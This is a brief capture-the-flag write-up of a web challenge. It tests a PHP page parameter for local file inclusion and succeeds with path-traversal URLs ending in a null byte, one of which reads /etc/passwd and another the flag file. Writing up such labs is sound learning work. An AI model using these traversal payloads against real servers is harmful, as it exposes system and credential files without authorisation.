![cff1cf2aaafcfb1bea3131a056c69af3.png](d1f7ae0bf7e94fdd82a5652f2ce2ca54.png)
![965a2adeef9fc99509641b509594901a.png](bd603931bd0f490984b0691d02a53128.png)
When clicking on one of the reference links, the url changes:
`jh2i.com:50010/?page=bit`
Looks to be pulling the page from the server. Check for LFI
![c38eb46ac57d3c70e230b33f34146106.png](8332413af78d474e9e7ccd0049f80254.png)
No dice there. Let's append a null byte and see what happens
`http://jh2i.com:50010/?page=../../../etc/passwd%00`
![80244cd1cc3846c9c40e3b57a1309690.png](816dfc2f19f44b65ba846bb87899fd6c.png)
There we go
`http://jh2i.com:50010/?page=../../../flag.txt%00`
![01d89e829d5fad1e2c6b71285ad875d7.png](fcb9249228124c118ee1cc57aecea4b8.png)
---
Back to [[_WebSite Publish/CTF/CTF Index|CTF Index]]
Tags: #ctf #file_inclusion #lfi #php #nullbyte #web
Related: